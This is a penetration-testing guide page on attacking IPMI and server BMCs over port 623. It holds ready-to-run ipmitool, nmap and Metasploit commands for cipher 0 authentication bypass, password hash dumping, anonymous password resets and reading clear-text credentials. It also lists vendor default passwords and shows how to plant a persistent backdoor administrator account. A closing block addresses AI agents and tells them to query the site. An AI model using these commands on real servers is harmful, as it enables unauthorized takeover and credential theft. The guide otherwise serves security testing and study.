# IPMI - Port 623/UDP/TCP

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

The Intelligent Platform Management Interface (IPMI) is a standardized protocol developed by Intel in 1998 to facilitate remote management and monitoring of computer systems, regardless of their operating state. IPMI operates independently of the system's CPU, firmware, and operating system, enabling administrators to perform tasks such as system monitoring, recovery, and maintenance even when the system is powered off or unresponsive. This functionality is primarily managed through the Baseboard Management Controller (BMC), a dedicated microcontroller embedded on the motherboard.

**Default Ports:** IPMI commonly utilizes UDP port 623 for network communication, though it can also operate over TCP.

<figure><img src="/files/YCsmmtQPXr0PT9RTPKPM" alt=""><figcaption></figcaption></figure>

## Enumerating IPMI Services

Effective enumeration of IPMI services is crucial for identifying potential vulnerabilities. The following methodologies and tools are instrumental in this process:

### Network Scanning with Nmap

Nmap can be employed to detect active IPMI services on a network:

```bash
nmap -n -p 623 <target-subnet>
nmap -n -sU -p 623 <target-subnet>
```

These commands scan the specified subnet for hosts with UDP port 623 open, indicating the presence of IPMI services.

### Identifying IPMI Version

Determining the IPMI version can provide insights into potential vulnerabilities:

```bash
nmap -sU --script ipmi-version -p 623 <target-ip>
```

Alternatively, the Metasploit auxiliary module can be utilized:

```bash
use auxiliary/scanner/ipmi/ipmi_version
```

## Common IPMI Vulnerabilities

Several vulnerabilities have been identified in IPMI implementations that could be exploited during penetration testing:

### Cipher 0 Authentication Bypass

A critical flaw in IPMI 2.0 involves the use of cipher suite 0, which allows authentication bypass. Attackers can exploit this by specifying cipher 0 to gain unauthorized access:

```bash
ipmitool -I lanplus -C 0 -H <target-ip> -U <username> -P <password> user list
```

This command lists user accounts without proper authentication, highlighting the severity of the vulnerability.

### Retrieval of Password Hashes via RAKP

The Remote Authenticated Key-Exchange Protocol (RAKP) in IPMI 2.0 contains a vulnerability that permits attackers to retrieve password hashes of valid users. These hashes can then be subjected to offline brute-force attacks to recover plaintext passwords. Metasploit provides a module to exploit this vulnerability:

```bash
use auxiliary/scanner/ipmi/ipmi_dumphashes
```

Successful execution retrieves hashed credentials, emphasizing the need for robust password policies.

### Anonymous Authentication

Some IPMI implementations allow anonymous authentication with null usernames and passwords. This misconfiguration can be exploited to perform unauthorized actions, such as resetting user passwords:

```bash
ipmitool -I lanplus -H <target-ip> -U '' -P '' user set password <user-id> <new-password>
```

This command resets the password for the specified user ID without proper authentication.

### Clear-Text Password Storage in Supermicro BMCs

Supermicro's IPMI implementation has been found to store administrator credentials in clear text within the BMC's filesystem, specifically in files like `/nv/PSBlock`. Attackers with access to the BMC can retrieve these credentials:

```bash
cat /nv/PSBlock
```

This practice poses significant security risks and underscores the importance of securing BMC access.

## Brute Force <a href="#brute-force" id="brute-force"></a>

**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows:

* **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level.
* Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
* Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.

## Introducing Backdoors into BMC from the Host <a href="#introducing-backdoors-into-bmc-from-the-host" id="introducing-backdoors-into-bmc-from-the-host"></a>

Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.

bash

```bash
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR
```

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/ipmi-port-623-udp-tcp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.